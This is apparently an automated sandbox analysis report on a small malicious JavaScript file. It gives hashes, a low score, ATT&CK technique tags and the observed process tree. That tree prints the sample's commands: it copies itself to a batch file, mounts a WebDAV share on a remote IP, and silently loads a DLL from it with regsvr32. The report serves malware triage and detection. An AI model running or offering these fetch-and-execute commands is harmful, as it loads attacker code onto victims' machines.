cb462b49abcef692e8e03cea05a1442da8e066eb0eda3c0a2b16ffd793bb3933

Analysis

max time kernel
117s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
09/07/2024, 08:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

289260722354814603.js
Size

5KB
MD5

6f7a2336c04c7952fb3c4bf88b321bee
SHA1

467c91cdf139a836b27d6c62860da4525d856d63
SHA256

cb462b49abcef692e8e03cea05a1442da8e066eb0eda3c0a2b16ffd793bb3933
SHA512

fb172fb9810c8e39b00b6a0931ed54705406a8dc5ab0fd46dd9bc6cd9b3cdd7331f8cbb10ec8a42ca1b1f4f15f2de0e67171a41f3b9759b6ea237d4c1023c3aa
SSDEEP

96:9HSuauBdekMEjuHFQxtWO0AoDNwiHv6H2Lk5+:VSnnGjuHFcwO0RDNwiPa2Lk5+

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2788	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1864 wrote to memory of 2484	1864	wscript.exe	30
PID 1864 wrote to memory of 2484	1864	wscript.exe	30
PID 1864 wrote to memory of 2484	1864	wscript.exe	30
PID 2484 wrote to memory of 2552	2484	cmd.exe	32
PID 2484 wrote to memory of 2552	2484	cmd.exe	32
PID 2484 wrote to memory of 2552	2484	cmd.exe	32
PID 2484 wrote to memory of 2788	2484	cmd.exe	33
PID 2484 wrote to memory of 2788	2484	cmd.exe	33
PID 2484 wrote to memory of 2788	2484	cmd.exe	33
PID 2484 wrote to memory of 2788	2484	cmd.exe	33
PID 2484 wrote to memory of 2788	2484	cmd.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\289260722354814603.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\289260722354814603.js" "C:\Users\Admin\\frctcd.bat" && "C:\Users\Admin\\frctcd.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:2552
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\215.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2788

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\frctcd.bat

Filesize
5KB

MD5
6f7a2336c04c7952fb3c4bf88b321bee

SHA1
467c91cdf139a836b27d6c62860da4525d856d63

SHA256
cb462b49abcef692e8e03cea05a1442da8e066eb0eda3c0a2b16ffd793bb3933

SHA512
fb172fb9810c8e39b00b6a0931ed54705406a8dc5ab0fd46dd9bc6cd9b3cdd7331f8cbb10ec8a42ca1b1f4f15f2de0e67171a41f3b9759b6ea237d4c1023c3aa

Download Submit